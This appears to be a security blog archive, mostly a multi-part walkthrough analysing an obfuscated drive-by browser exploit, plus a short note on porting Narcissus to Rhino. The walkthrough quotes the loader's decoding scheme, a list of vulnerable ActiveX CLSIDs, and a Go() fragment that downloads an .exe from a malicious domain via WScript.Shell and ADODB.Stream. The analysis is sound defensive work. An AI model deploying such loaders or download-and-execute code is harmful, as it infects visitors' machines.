Archive for February, 2010

Porting Narcissus to Rhino

Friday, February 26th, 2010

I just spent a couple of days trying to build Spidermonkey on Windows with Narcissus, JS_THREADSAFE and JS_HAS_FILE_OBJECT support in order to parse and do some static analysis of malicious JS.

After patching the Makefiles (and cpp in one place) and trying way too hard to make it work, I’ve got to warn others off of going down this route. I repeat: DON’T try to make it work. First, you’ll find that there’s no easily available parsing API in Spidermonkey itself and that building in extensions is incredibly tedious and error-prone (despite the great autoconfig work done in 1.8.1 for the vanilla build, which works perfectly); second, the non-standard File object is no longer maintained and as of Feb 10, 2010 is completely removed.

So with that option DOA, if you had your heart set on using Narcissus for parsing, it can be trivially ported to Rhino. Despite Brendan’s comments in the Narc code and other locations on the web that it relies on several Spidermonkey-specific extensions, it runs perfectly fine (at least the parser does) with a few minor changes. Here is the code, a diff, and a sample tree walker.

Malware Analysis Walking Tour (The Exploit)

Thursday, February 25th, 2010

If you’re just tuning in, this is the second post in a series. Check out the beginning of the Malware Analysis Walking Tour to see how we got here.

The Exploit

Everything up to this point has just been a wrapper around the actual exploit; boilerplate or necessary paperwork if you will. Now it’s time to look at what code actually got the machine to do something it wasn’t supposed to do, that is, what caused the SgwAg.exe to get written to disk and ultimately executed.
Again, I start with a topical readthrough to get an idea of what’s significant and the general flow (full decoded exploit routine in Appendix 2). I see that the exploit code consists of a series of function definitions followed by a single statement: a call to mudac().

function Complete() { [...] }
function mudac() { [...] }
function Func4() { [...] }
function FuncPD() { [...] }
function FuncKJ() { [...] }
mudac();

The mudac() function is actually a slightly modified form of one we’ve seen many times before; probably copy and pasted code from some malware forum or a published exploit. The function simply tries to instantiate a list of known-vulnerable CLSIDs (ActiveX controls) and stops at the first one that gives it shell access. If all those fail, it falls through to the creatively named Func4, FuncPD, and FuncKJ to try some Acrobat and Java applet exploits.

function mudac()
{
    var mdacok = 0;
    var i = 0;
    var objects = new Array(
        '{BD96C556-65A3-11D0-983A-00C04FC29E36}',
        '{BD96C556-65A3-11D0-983A-00C04FC29E36}',
        '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}',
        '{0006F033-0000-0000-C000-000000000046}'
        ,... [...many more of these...] );
    while (objects[i])
    {
        var a = null;
        if (objects[i].substring(0, 1) == '{')
        {
            a = document.createElement('object');
            a.setAttribute('classid', 'clsid:' + objects[i].substring(1, objects[i].length - 1));
        }
        else {
            try {
                a = new ActiveXObject(objects[i]);
            }
            catch (e) {}
        }

Given the relatively low level of sophistication here combined with the fact that the Malware Scanner VM that got owned is missing a lot of patches, I don’t expect that any of these will be new to us, but panning for gold is always a tedious process. Here Google is our friend. If I plug in a CLSID and it comes back with a lot of pages discussing an exploit then it’s probably nothing new. If all the pages we see are from MSDN or application programming forums, then this is more likely to be something that isn’t widely known as being exploited. The middle ground is that it’s a control that has been exploited before, but there’s some new vector; in practice this doesn’t happen too often. Take it away Google:

CLSID                                 Known from                    Name
BD96C556-65A3-11D0-983A-00C04FC29E36  MS06-014                      RDS.DataSpace
AB9BCEDD-EC7E-47E1-9322-D4A210617116  MS06-014
0006F033-0000-0000-C000-000000000046  MS06-014                      Outlook Data Object
6e32070a-766d-4ee6-879c-dc1fa91d2fc3  MS06-014                      MUWebControl
6414512B-B978-451D-A0D8-FCFDF33E833C  ?                             WUWebControl
7F5B7F63-F06F-4331-8A26-339E03C0AE3D  MS06-014, MS06-073, MS07-016
06723E09-F4C2-43c8-8358-09FCD1DB0766  MS06-014
639F725F-1B2D-4831-A9FD-874847682010  MS06-014                      DExplore.AppObj.8.0
BA018599-1DB3-44f9-83B4-461454C84BF8  MS06-014                      VisualStudio.DTE.8.0
D0C07D56-7C69-43F1-B4A0-25F5A11FAB19  Metasploit                    Microsoft.DbgClr.DTE.8.0
E8CCCDDF-CA28-496b-B050-6C07C962476B  Metasploit                    VsaIDE.DTE

Most of these have been well analyzed and reported on. The only one that didn’t have a clear story was 6414512B-B978-451D-A0D8-FCFDF33E833C. It’s worth revisiting once we’ve finished analyzing what happens after one of these is instantiated. We still don’t know which control actually owns the machine. The mudac function is a pretty standard example of the drive-by malware approach of “throw a bunch of crap at the browser and see if something works” (you can actually see that the same GUIDs appear multiple times in the objects array; clearly some copy-paste-kitchen-sink coding going on here). We’ll put this issue on the back burner for now; it’s enough to know that one of them worked.
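The repeated entries can also be spotted mechanically rather than by eye. Here is a minimal sketch in Python, assuming only the four CLSIDs visible in the excerpt (the rest of the array is elided in the listing, so it is left out here); duplicate_clsids is a hypothetical helper name, not something from the exploit.

```python
from collections import Counter

# Only the four entries visible in the excerpt of the objects array;
# the remainder of the list is elided in the post and not reproduced here.
objects = [
    "{BD96C556-65A3-11D0-983A-00C04FC29E36}",
    "{BD96C556-65A3-11D0-983A-00C04FC29E36}",
    "{AB9BCEDD-EC7E-47E1-9322-D4A210617116}",
    "{0006F033-0000-0000-C000-000000000046}",
]


def duplicate_clsids(clsids):
    """Return the CLSIDs that occur more than once, compared case-insensitively."""
    counts = Counter(c.strip("{}").upper() for c in clsids)
    return {clsid: n for clsid, n in counts.items() if n > 1}


print(duplicate_clsids(objects))
```

Upper-casing before counting matters because the list mixes upper- and lower-case hex digits for what are otherwise the same kind of identifier.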

At this point I read CreateO() and Go() to see what the code is doing after it finds an ActiveX control it can instantiate. The first thing I notice is that the name of the exe that gets created (SgwAg.exe) doesn’t show up anywhere. I suspect that the “filename” var in Go() might be randomly generated by the server. Let’s see what happens if we get the page again.

$ wgetasie http://nevpizdy-nenyznie50domain.in
$
$ tail -n 5 index.html.1
function vo3vSHVwARAZTn ( dpykxo,AEvKPWK6 ) { var awsTEVuk = new String();var
HHHXupleSC = new String();
 var qIdJvCEMJ = dpykxo.split(';'); for(iKPD3 = 0;iKPD3 < qIdJvCEMJ.length-
1;iKPD3++)
 { awsTEVuk = String['f#ro!mC#ha@r^C&ode'.replace(/@|&|#|\^|\!|\(|\)/ig, '')]
(qIdJvCEMJ[iKPD3] - AEvKPWK6);
HHHXupleSC = HHHXupleSC + awsTEVuk;} return HHHXupleSC;}var vnfjqq =
Date();VXR9U = vo3vSHVwARAZTn(Z5E1xxR,NJXUlfyA);
var qIdJvCEMJ = 'awsTEVuk';function krasddk(zxc) {eval(zxc); return;};krasddk(
VXR9U );</script></body></html>

Ah! Lots of different variable names, same structure. Is the Modified Date at least constant?

$ stat index.html.1
 [...]
 Modify: 2009-12-28 19:23:41.000000000 -0800

Nope. So, it looks like there’s a real script on the other end that’s re-doing the obfuscation on each request. Cheeky bastards. No bother, we can confirm by going back to the original content that the Malware Scanner picked up and verifying that (when decoded) the filename that gets written is indeed the one supplied in Go().
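The "different names, same structure" observation can be checked roughly in code. This is a sketch under a crude assumption: every identifier-like token is collapsed to a placeholder and whitespace is dropped, so only the shape of the statement remains. The fingerprint helper is hypothetical, and the two inputs are the corresponding decode calls from the two copies of the page.

```python
import re

# Anything that looks like a JavaScript identifier (keywords included).
IDENTIFIER = re.compile(r"[A-Za-z_$][A-Za-z0-9_$]*")


def fingerprint(script):
    """Collapse identifiers to 'ID' and strip whitespace, leaving only the shape."""
    shape = IDENTIFIER.sub("ID", script)
    return re.sub(r"\s+", "", shape)


first_fetch = "LCEsM = aXzLA9jbkkRMIW(FhcL0z0,k0miOe5c);"
second_fetch = "VXR9U = vo3vSHVwARAZTn(Z5E1xxR,NJXUlfyA);"

print(fingerprint(first_fetch))
print(fingerprint(first_fetch) == fingerprint(second_fetch))
```

A real detection would want a proper tokenizer, since this regex also rewrites keywords and the contents of string literals, but it is enough to show that renaming variables alone does not change the fingerprint.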

Copying the page from the Scanner report into index.html.from_scanner and stripping any of the HTML/DOM cruft, then changing eval() to print() lets us run the code outside of a browser. The only other change we need to make is to short-circuit the lastModified check. Since we know the first character in the resulting plaintext is “f” (character code 102), it’s easy to work back to the decoding key: the first encoded number is 118, so the key is 118 - 102 = 16.
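The known-plaintext trick is small enough to write down. A minimal sketch, assuming the decoded script always starts with the word "function"; both helper names are hypothetical. The second example uses the leading numbers of the copy fetched with wget in the first post of this series.

```python
def key_from_known_plaintext(first_code, known_char="f"):
    """Key = first encoded number minus the code of the expected first character."""
    return first_code - ord(known_char)


def looks_right(codes, key, expected="function"):
    """Sanity check: do the leading codes decode to the expected word?"""
    decoded = "".join(chr(c - key) for c in codes[:len(expected)])
    return decoded == expected


# Scanner copy: the first encoded number is 118.
print(key_from_known_plaintext(118))

# wget copy: leading numbers of the encoded blob.
wget_codes = [153, 168, 161, 150, 167, 156, 162, 161]
key = key_from_known_plaintext(wget_codes[0])
print(key, looks_right(wget_codes, key))
```

Checking a whole word rather than a single character guards against a wrong guess about what the plaintext starts with.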

$ js index.html.from_scanner | grep "var filename"
 var filename = 'SgwAg.exe';

Good, we’re back on solid ground. So, we know the nature of the obfuscation and the exploit, and have isolated the payload. Next up is payload analysis, but for a number of reasons we like to have samples of each exploit vector that we find in the wild.

So, I cook up a version of this exploit that downloads a demo payload; I like calc.exe. It’s a simple matter of finding the part of the obfuscated script element that corresponds to the evil payload url and replacing it with the url of something more benign. While I’m at it, I add an alert() to print which ActiveX control actually causes the payload to be downloaded and run (remember that it tries several) and also remove the couple of other Java and Acrobat exploits.

 
...155c167X167s163h109o98c98C161d152M169...
 =  h   t   t   p   :  /  /   n   e   v
 http://nevpizdy-nenyznie50domain.in/feedback.php?page=1

 http://example.com/demo-payload                       (I used a real url of course)
    h   t   t   p   :  /  /   e   x   a
...155a167a167a163a109a98a98a152a171a148...
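Producing the replacement string by hand gets tedious, so here is a sketch of the encoding direction. It assumes the key is 51, which is what the excerpt above implies (155 stands for "h", and 104 + 51 = 155), and it uses a fixed filler letter instead of random ones. The encode helper is hypothetical and the URL is the placeholder from above, not the real one.

```python
def encode(text, key, filler="a"):
    """Encode each character as (char code + key) followed by one filler letter."""
    return "".join(f"{ord(ch) + key}{filler}" for ch in text)


KEY = 51  # assumption: implied by the excerpt, where 155 decodes to 'h'
replacement = "http://example.com/demo-payload"  # placeholder URL

print(encode(replacement, KEY))
```

Any non-digit works as filler, because the page's decoder replaces every non-digit character with a separator before splitting.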

Copy it over to the test server, fire up an unpatched IE and…Bingo.

This would be enough to call it a day if we were only interested in the exploit vector; it’s a well known exploit vector and now we’ve got a nice sample in case we ever need to reproduce it. However, we could still take a look at the payload it brought down.

Next Time: The Payload

Malware Analysis Walking Tour

Tuesday, February 23rd, 2010

Part of my day job lately has been to build up a catalog of drive-by browser exploits and so I decided to put up some notes on the process. When I first started taking apart malware, the detailed examples I found online were invaluable, so I’m putting this up partly to try to give back and partly to try to make the whole process a little more accessible to the interested but not-quite-as-technical reader. Feel free to post a reply or contact me with questions or comments.

Getting Started

Sometimes finding a piece of malware to examine can be the first hurdle in doing any analysis. Here we have it pretty easy; we run a malware scanner that crawls the net with a swarm of unpatched virtual machines and monitors them to detect unusual behavior. When one of them exhibits symptoms of malware we can dump information about what happened to the machine, restore it from a snapshot, and send it back out to continue trawling.

Here we can see that the root page of nevpizdy-nenyznie50domain.in caused some suspect behavior on an unpatched XP/IE6 VM. Let’s take a look at what happened.

The static analysis came back clean. No real surprise there, since static analysis is a coarse-grained, best effort type approach; it picks up the obvious stuff, but it’s easy to fool. This exploit is going to be worth looking into, if for no other reason than it will help us refine our static analysis detections.

Runtime (aka dynamic) analysis is where we’re really going to see stuff happen. Here we see a new process being executed from some binary file that shouldn’t be there; whatever the exploit is, the words “arbitrary code execution” are going to show up in the description.

I don’t know where that file came from at this point; best guess is that it’s being downloaded from some remote site rather than manufactured by logic on the page. We’ll see.

Time to get out of the GUI and get our hands dirty. Before I get to the code, a word of warning: don’t go visit these urls. They’ve demonstrably owned a machine already, so unless you really want to know if it happens every time you should probably keep your hands in your pockets on this one.

$ mkdir nevpizdy-nenyznie50domain.in
$ cd nevpizdy-nenyznie50domain.in/
$ touch notes
$ wgetasie http://nevpizdy-nenyznie50domain.in
$ chmod -w index.html
$ less index.html
<html><body><div style="display: none"><ul><li
id="khBsFxi">153n168Q161h150s167b156H162S161s83v118K162K160c163U159w152a167I152y91t92i61y174b61Q83Z83F83b83V166n152I167D135i156d160r152z162K168k167a91R90D159T162N150O148d167q156i162a161R97r155Z165K152Z153X83m112p83w85s148R149S162f168Z167W109O149C159N148O161N158y85p90e95B83I100s99P99m99i99y92M110z61q176l61K61P15
3J168w161F150G167p156X162Y161U83w122u162j91z148I92x61M174G61m83r83I83v83k169Y148h165T83W166u83T112N83g118d165c152p148a167i152w130P91F148U95k83C90P138U134C150Y165R156P163e167E97H134n155z152r159L159h90L92i110b61e83v83H83I83Y169x148j165G83t162y83M112O83j118O165d152D148Q167C152V130g91h148a95n83U90a116e119f130H119q1
[...]

Hmm, clearly some obfuscated exploit code, but doesn’t look like an encoding I’ve seen before. There’s a lot of that junk (full content in Appendix 1 of this pdf if you want to follow along), but what comes after is more immediately interesting (if horribly ugly):

 
<script>function zacabab (abeicd) { var terry = abeicd.split(':'); var merry = 'zxc'; return terry[2];};</script>
<script>
 var FhcL0z0 = new String(""); FhcL0z0 = document.getElementById("khBsFxi").innerHTML;
g6VZ13w8 = document.lastModified; k0miOe5c = zacabab(g6VZ13w8); FhcL0z0 =  FhcL0z0.replace(/[^0-9]/g,';');
function aXzLA9jbkkRMIW ( OzNL6t,em7lqjVq ) { var AYMQGuD7 = new String();var bsL1aXtpUc = new String();
 var mXhEn59Xi = OzNL6t.split(';'); for(euWM8 = 0;euWM8 < mXhEn59Xi.length-1;euWM8++)
 { AYMQGuD7 = String['f#ro!mC#ha@r^C&ode'.replace(/@|&|#|\^|\!|\(|\)/ig, '')](mXhEn59Xi[euWM8] - em7lqjVq);
bsL1aXtpUc = bsL1aXtpUc + AYMQGuD7;} return bsL1aXtpUc;}var vnfjqq = Date();LCEsM = aXzLA9jbkkRMIW(FhcL0z0,k0miOe5c);
var mXhEn59Xi = 'AYMQGuD7';function krasddk(zxc) {eval(zxc); return;};krasddk( LCEsM );</script>

This is the decoding part of the script (or a pretty-printed version in Appendix 2 of the pdf). So, there are two ways to do this right now; one is to carefully take this script apart and manually decode it piece by piece, the other is to let it do its thing in a javascript debugger and just grab whatever it decodes from memory. The latter is a lot faster.

Since this is a payload that targets Windows machines and I’m on a reduced privilege account on a Linux machine, it’s reasonable to let this thing run. Just in case, I take a moment to switch Firefox to use Paros proxy so that if the script makes any requests I can record them and then drop them.

I open up Firebug on a blank page, set “Break on Next”, and then load the index.html that I pulled down with wget. When the page has finished rendering, I take a look at the DOM to see if anything jumps out at me; in this case, something does.

FhcL0z0 = "153;168;161;150;167;156;162;161;83;118;162;160;163;159;152;167;152;91;92;61;174;61;83;83;83;83;166;152;167;135;156;160;152;162;168;167;91;90;159;162;150;148;167;156;162;161;97;155;165;152;153;83;112;83;85;148;149;162;168;167;109;149;159;148;161;158;85;90;95;83;100;99;99;99;99;92;110;61;176;61;61;153;168;161[…]

So FhcL0z0 is now interesting. Where did it come from?

FhcL0z0 = document.getElementById("khBsFxi").innerHTML;
FhcL0z0 =  FhcL0z0.replace(/[^0-9]/g,';');

Remember the <li> that started out with “153n168Q161h150s167…”? It turns out that strange looking “encoding” scheme was just sticking random letters between the sets of numbers. This is a case where code reading could have turned up the info just as quickly as running the script: two methods, both will usually work.
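The same normalization is a one-liner outside the browser. A minimal sketch in Python that mirrors the page's replace(/[^0-9]/g,';') call on the first few characters of the <li> content; strip_junk is a hypothetical name.

```python
import re


def strip_junk(blob):
    """Replace every non-digit character with ';', as the page's regex does."""
    return re.sub(r"[^0-9]", ";", blob)


# Leading characters of the <li id="khBsFxi"> content.
sample = "153n168Q161h150s167b156H162S161s"
print(strip_junk(sample))
```

The result lines up with the start of the FhcL0z0 value that Firebug showed, which is a quick way to confirm the reading of the code.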

The nice thing about running it is that there’s still lots of stuff in the DOM to look at. Back to Firebug:

LCEsM =function Complete()
{
    setTimeout('location.href = \"about:blank\"', 10000);
}
function Go(a)
{
    var s = CreateO(a, 'WScript.Shell');
    var o = CreateO(a, 'ADODB.Stream');
    var e = s.Environment('Process');
    var urltofile = 'http://nevpizdy-nenyznie50domain.in/feedback.php?page=1';
    var filename = 'hgivV.exe';
    var xhr = null;
    var bin = e.Item('TEMP') + '\\' + filename;
[...]

Hey, that’s nice. There’s only one layer of obfuscation going on here; once we get through the junk in FhcL0z0, it’s pretty readable (they even left the linebreaks in, how thoughtful). This is the code that actually performs the exploit; it gets executed via a gently-obfuscated eval() call at the end of the script tag: krasddk( LCEsM );
We don’t really need to know at this point, but it might be instructive to figure out where LCEsM came from.

LCEsM = aXzLA9jbkkRMIW(FhcL0z0,k0miOe5c);

Long story short, LCEsM is produced by decoding FhcL0z0 using a function and a key. The function is a simple for-loop that walks the input string and executes an obfuscated call to fromCharCode. The key comes from the page’s last-modified date:

g6VZ13w8 = document.lastModified;
k0miOe5c = zacabab(g6VZ13w8);

The zacabab() function just splits the date at each “:” and returns the third piece, which for this date format is the seconds field. Firebug tells me that the last modified date of the file is “12/28/2009 14:42:51” (and examining g6VZ13w8 and k0miOe5c confirms this); therefore the key needed to decode it is 51. A quick check verifies that we understand the encoding scheme.

$ python
>>> encoded = "153;168;161;150;167;156;162;161"
>>> "".join([chr(int(c) - 51) for c in encoded.split(";")])
'function'
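Going one step further, the whole chain (lastModified string to key, raw blob to plaintext) fits in a few lines. This is a sketch of my reading of the page's logic rather than a port of the obfuscated JavaScript; the function names are hypothetical, and the blob is just the leading part of the <li> content.

```python
import re


def key_from_last_modified(last_modified):
    """Mirror zacabab(): split on ':' and take the third piece (the seconds)."""
    return int(last_modified.split(":")[2])


def decode(blob, key):
    """Drop the junk letters, then shift every number down by the key."""
    codes = [c for c in re.sub(r"[^0-9]", ";", blob).split(";") if c]
    return "".join(chr(int(c) - key) for c in codes)


last_modified = "12/28/2009 14:42:51"
blob = "153n168Q161h150s167b156H162S161s83v118K162K160c163U159w152a167I152y91t92i"

key = key_from_last_modified(last_modified)
print(key)
print(decode(blob, key))
```

Feeding it the full contents of the element should yield the same script that Firebug showed in LCEsM, assuming the file's timestamp was preserved.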

As an aside, this is a perfect example of why DRM is ultimately a losing battle; if you provide someone with the ciphertext, the scrambling method, and the key, then you have provided them with everything they need to compromise your system. It works the same no matter if you’re a blackhat or a movie studio.

Back to the analysis, a quick bravo is called for to the folks behind wget. It correctly preserved the Last Modified date while saving the page to the filesystem; without that, there would have been a lot more trial and error in figuring out the key. Thanks Hrvoje Niksic and Micah Cowan!

$ stat index.html
[...]
Modify: 2009-12-28 14:42:51.000000000 -0800

It seems that the detour to figure out how LCEsM was encoded was time well spent. We learned about an interesting obfuscation scheme (using lastModified) and learned that wget easily mitigates it. We can add this sort of information to static detections to correlate different exploits encoded by the same toolkit and do trending on related malware.
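Because wget keeps the timestamp, the candidate key can be read straight off the saved file. A minimal sketch, assuming a POSIX-style modification time and a time zone offset in whole minutes (so the seconds field is the same one the browser would report); key_from_mtime is a hypothetical helper.

```python
import os


def key_from_mtime(path):
    """Seconds field of the file's modification time, used as the candidate key."""
    return int(os.stat(path).st_mtime) % 60


if os.path.exists("index.html"):
    print(key_from_mtime("index.html"))
```

If the file has been copied or edited since the download, the timestamp is gone and the known-plaintext approach is the fallback.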

Next Time: The Exploit